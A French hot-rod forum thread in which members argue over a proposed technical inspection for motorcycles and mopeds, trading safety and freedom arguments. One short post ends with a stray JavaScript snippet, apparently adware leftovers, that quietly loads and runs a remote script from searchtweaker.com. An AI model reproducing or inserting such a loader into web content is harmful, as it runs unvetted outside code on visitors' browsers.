Forum
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.


Forum sur les Hot rods et Kustoms
 
AccueilAccueil  RechercherRechercher  Dernières imagesDernières images  S'enregistrerS'enregistrer  ConnexionConnexion  
Le deal à ne pas rater :
Où acheter la display japonaise One Piece Card Game PRB-01 One Piece ...
Voir le deal
anipassion.com

 

 Quand la passion s’éxprime sur deux roues..

Aller en bas 
+3
34
andy4rrrr
hotroudy
7 participants
AuteurMessage
hotroudy

hotroudy


Nombre de messages : 1302
Age : 50
Localisation : 88 france(lorraine)
Points : 120
Date d'inscription : 29/04/2007

Quand la passion s’éxprime sur deux roues.. Empty
MessageSujet: Quand la passion s’éxprime sur deux roues..   Quand la passion s’éxprime sur deux roues.. Icon_minitimeMer 10 Juil - 1:27

http://www.motardsencolere.com/spip.php?rubrique53


merci a vous a nous ..
Revenir en haut Aller en bas
andy4rrrr

andy4rrrr


Nombre de messages : 6232
Age : 80
Localisation : en enfer
Points : 10969
Date d'inscription : 20/03/2007

Quand la passion s’éxprime sur deux roues.. Empty
MessageSujet: quand la passion ...............   Quand la passion s’éxprime sur deux roues.. Icon_minitimeMer 10 Juil - 8:05

c'est bon signé pour moi thumright thumright thumright 
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Revenir en haut Aller en bas
https://www.dailymotion.com/andy4rrrr
34

34


Nombre de messages : 1844
Age : 56
Localisation : normandie/ france
Points : 2125
Date d'inscription : 03/12/2010

Quand la passion s’éxprime sur deux roues.. Empty
MessageSujet: Re: Quand la passion s’éxprime sur deux roues..   Quand la passion s’éxprime sur deux roues.. Icon_minitimeMer 10 Juil - 8:47

pas moi Razz 

Même si c'est seulement 1% des cas d'accident, pourquoi pas... En plus si ça peut permettre une vérification des bidouilles, cligno, échappements trop sonore...
pourquoi pas.
Revenir en haut Aller en bas
roberto rolling

roberto rolling


Nombre de messages : 590
Age : 66
Localisation : france
Points : 688
Date d'inscription : 05/03/2013

Quand la passion s’éxprime sur deux roues.. Empty
MessageSujet: Re: Quand la passion s’éxprime sur deux roues..   Quand la passion s’éxprime sur deux roues.. Icon_minitimeMer 10 Juil - 11:27

c est pas cool 34

moi je dis FTS
Revenir en haut Aller en bas
stang 54

stang 54


Nombre de messages : 366
Age : 64
Localisation : jolivet 54
Points : 202
Date d'inscription : 12/11/2006

Quand la passion s’éxprime sur deux roues.. Empty
MessageSujet: Re: Quand la passion s’éxprime sur deux roues..   Quand la passion s’éxprime sur deux roues.. Icon_minitimeMer 10 Juil - 11:41

Mad pas cool du tout 34 ,,si on fesait un contrôle bien en regle sur les rod il n y en aurait pas beaucoup sur les routes ,,,
Revenir en haut Aller en bas
34

34


Nombre de messages : 1844
Age : 56
Localisation : normandie/ france
Points : 2125
Date d'inscription : 03/12/2010

Quand la passion s’éxprime sur deux roues.. Empty
MessageSujet: Re: Quand la passion s’éxprime sur deux roues..   Quand la passion s’éxprime sur deux roues.. Icon_minitimeMer 10 Juil - 12:23

Si le 1% c'est un gosse que tu connais, qui n'avait pas un 2 roues au meilleur de sa forme (freins, éclairage) que tu ramasses (inanimé) sur la route un soir quand tu rentres chez toi...
Je ne te souhaite pas d'appeler ses parents... vraiment

Parce que ce contrôle est pour les petits 2 roues si j'ai bien lu et si ça peut éviter ça, bien sur je suis pour.

Roberto  que tu dire FTS
Revenir en haut Aller en bas
hot import

hot import


Nombre de messages : 7111
Age : 52
Localisation : entre terre et eau, dans le marais poitevin
Points : 4749
Date d'inscription : 11/01/2006

Quand la passion s’éxprime sur deux roues.. Empty
MessageSujet: Re: Quand la passion s’éxprime sur deux roues..   Quand la passion s’éxprime sur deux roues.. Icon_minitimeMer 10 Juil - 12:28

Signé et je fait suivre le lien aux potes motard...
Revenir en haut Aller en bas
roberto rolling

roberto rolling


Nombre de messages : 590
Age : 66
Localisation : france
Points : 688
Date d'inscription : 05/03/2013

Quand la passion s’éxprime sur deux roues.. Empty
MessageSujet: Re: Quand la passion s’éxprime sur deux roues..   Quand la passion s’éxprime sur deux roues.. Icon_minitimeMer 10 Juil - 12:52

FUCK THE SYSTEME
moi je roule en harley sans compteur sans cligno en drigpipe sans chicanne et je men fous
jai 56 ans et jai rouler quand j etais mome a l epoque ont roulait sans casque en gitanne testi avec carbu de 19 delortto et pot de detante sans silencieux et alors faut que jeunesse se fasse y en a marre de leurs soit disant connerie pour le bien de ... il y auras toujours malheureusement des accidents mais faut pas tomber dans leur piege

en plus 34 escuse moi tu peux pas etre d accord pour une chose et delirer avec tes rod
c est pas compatible

et moi mon gosse je lui ait toujours dis amuse toi mais fait attention et je lui metait un kit sur sa becanne

donc moi roberto je suis coherant dans mes propos et dans ma fason de vivre
mais toi 34 jai pas le meme santiment dommage qu il y est des personnes comme sa
c est sans doute pour cette raison que tous part en couilles

donc je dis .....FTW ET FTS

sans rancune quand meme 34
je dis juste se que jen pense
cordialement
Revenir en haut Aller en bas
34

34


Nombre de messages : 1844
Age : 56
Localisation : normandie/ france
Points : 2125
Date d'inscription : 03/12/2010

Quand la passion s’éxprime sur deux roues.. Empty
MessageSujet: Re: Quand la passion s’éxprime sur deux roues..   Quand la passion s’éxprime sur deux roues.. Icon_minitimeMer 10 Juil - 14:06

Aucune rancune, un forum est bien un lieu de discutions ouvert ou l'on peu exposer ses points de vues. Si tu viens à Béthune on pourra en reparler, cordialement comme tu dis et si tu veux Wink 

bientôt 45 Mr. Green  Arrow  103 kit 75 polini liquide, diamètre 17 pipes, clapets, pot absorption allumage motoplat de Kart, embrayage fixe, plateau de 102, pignon 13, petite couronne, frein disque av (doit bien avoir une photo Rolling Eyes ). bon pas de bas mais une bonne vitesse de pointe Mr.Red  Un bras, une jambe Neutral et renversé volontairement par une voiture vexé parce que je l'avais doublé Shocked (putain 504) mais toujours un casque, heureusement, enfin pour moi.

Le 39 passe le contrôle, les contrôleurs en France n’ont pas leur mot à dire sur ( c'est d'origine ou pas d'origine). tant que le freinage est équilibré, l' éclairage correct... dont les cligno important pour savoir ce que les autres font (il est vrais qu' en voiture et moto tout le monde ne connait pas l’emplacement de la manette qui les actionnent Rolling Eyes )

Qu'est ce qui vous gêne le plus, c'est les 50€ tout les 2 ans, l'heure perdue ? Il est évidant que les motards entretiennent bien mieux leurs machines que les automobilistes. Mais depuis les contrôles automobiles il y a bien moins de poubelles sur la route. C'est un plus pour vous aussi non Wink 

Revenir en haut Aller en bas
shifter's

shifter's


Nombre de messages : 2442
Age : 45
Localisation : alpes de haute provence
Points : 2374
Date d'inscription : 30/05/2006

Quand la passion s’éxprime sur deux roues.. Empty
MessageSujet: Re: Quand la passion s’éxprime sur deux roues..   Quand la passion s’éxprime sur deux roues.. Icon_minitimeMer 10 Juil - 16:53

hot import , tu remarquera que les plus inquiets sont ceux qui roulent en HD , perso je suis pour un controle technique regulier sur tout les vehicules , c'est une question de securiter pour tous , je roule en Harley j'ai (enfin je fait faire) un rod le tout avec clignos ceinture feux , c'est deja assez dangereux comme ca si en plus ton brelon (de n'importe quelle type rod cox moto soucoupe...)n'est pas securiser
Revenir en haut Aller en bas
http://lasvegasfamily.centerblog.net
hot import

hot import


Nombre de messages : 7111
Age : 52
Localisation : entre terre et eau, dans le marais poitevin
Points : 4749
Date d'inscription : 11/01/2006

Quand la passion s’éxprime sur deux roues.. Empty
MessageSujet: Re: Quand la passion s’éxprime sur deux roues..   Quand la passion s’éxprime sur deux roues.. Icon_minitimeMer 10 Juil - 17:55

bon aller ma petite sauce a moi....

sur le fond je trouve logique que tout véhicule soi contrôlé..en sachant comme dit au dessus, que n'importe quelle moto et d'autant plus si elle est " customisée " est bien mieux entretenue que pas mal de bagnoles...sur le principe, je suis contre, je voit pas l'intérêt, si ce n'est te faire chier parce que ta moto a un pot qui fait un peu plus de décibels !! et te gratter 50 euros au passage...alors que cette moto dort au garage, est lavée tout les WE, et que le proprio en prend soin presque autant que sa femme !! ( des fois plus !! pardon mesdames !! enfin pas pour moi...Very Happy )

regardez les motos autours de vous, et dites moi la vérité, a part de la poussière, ce ne sont jamais des poubelles...jap' ,HD, etc...

y'a des malins en voitures, qui s'en foutent comme l'an mille, roule phare cassé, un rétro arraché ou autre et change ou répare la veille du CT c'est du déja vu..Rolling Eyes 

avec derrière moi 10 ans de pompier volontaire, j'ai mis au monde des enfants, réanimer des vieux, des jeunes, vu des gens mourir dans mes bras, des gens j'en ai ramassé, death or live en voiture en moto, a pied, etc...dans la plupart des cas, la machine n'a jamais été mise en cause parce que le pot truc ou la fourche machin, ça a toujours été une erreur humaine, soit automobiliste ( bah oui, on a l'impression quand même que les clignos et les rétro ça sert a rien sur ces putain de voitures !! ), soi motard et quelque soit l'âge..

j'admet que beaucoup de jeunes motard en derbi ou autres on eu des soucis, mais c'est la jeunesse, a cet âge on ai con, on se prend pour le maitre de la route, on a tout vu et tout fait, fuck les flics et compagnie...non ? aller vous aussi...secouer vos souvenirs..admettez que vous aussi la mort vous a frolée...moi oui....

j'admet aussi que des motards se prennent pour des virtuoses de la conduite et prennent des risques pour aller vite, là je dit t'es un con, ta femme pleurera un jour avec tes gosses dans ses bras..

ce n'est pas pour rien que les fédérations actuelles tentent de mettre en place de plus en plus d'accès circuit en 2 ou 4 roues..faut le faire, promouvoir ces initiatives...moi je le fait, on a un circuit a 20 mn de la maison, ça tourne dur tout les WE, j'adore cette responsabilité prise par ces gars..Cool 

ce que je califie de poubelles parce que y'en a , c'est vrai ,ce sont souvent des scoot ou des mob style "bleue " appartenant a des piliers de comptoir du trou du cul du monde, ça aussi ça existe, même du côté de chez vous, le gars sort du rade avec quelques grammes, mets son casque de 1960 sans lanière et repeint 5 fois a la bombe, pose son cul de travers sur la selle et tente de rentrer temps bien que mal, des fois il y arrive, des fois on le ramasse dans le fossé tout seul, des fois sous une bagnole..

c'était, c'est et ça restera un sujet délicat...

il ai vrai que je voit bien le controleur arrivé.....Mossieur, votre pot, Mossieur la taille du pneu, etc...Razz 

je trouve bien et accepte le débat, on discute, on donne son opinion, et comme d'ab, on se respecte....mais ça vous le savez tous les copains, hein ?

a vous les studios...

Wink 



Revenir en haut Aller en bas
 
Quand la passion s’éxprime sur deux roues..
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» on écoutait quoi quand tu et né
» pas d aile,pas un hot rod mais quand meme sa pousse
» rien a voir avec le rod mais quand meme vous aimez le blues
» FORD passion...
» Passion BOBBER

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Forum :: Mécanique, Restauration, Technique :: Vos projets 2 roues-
Sauter vers: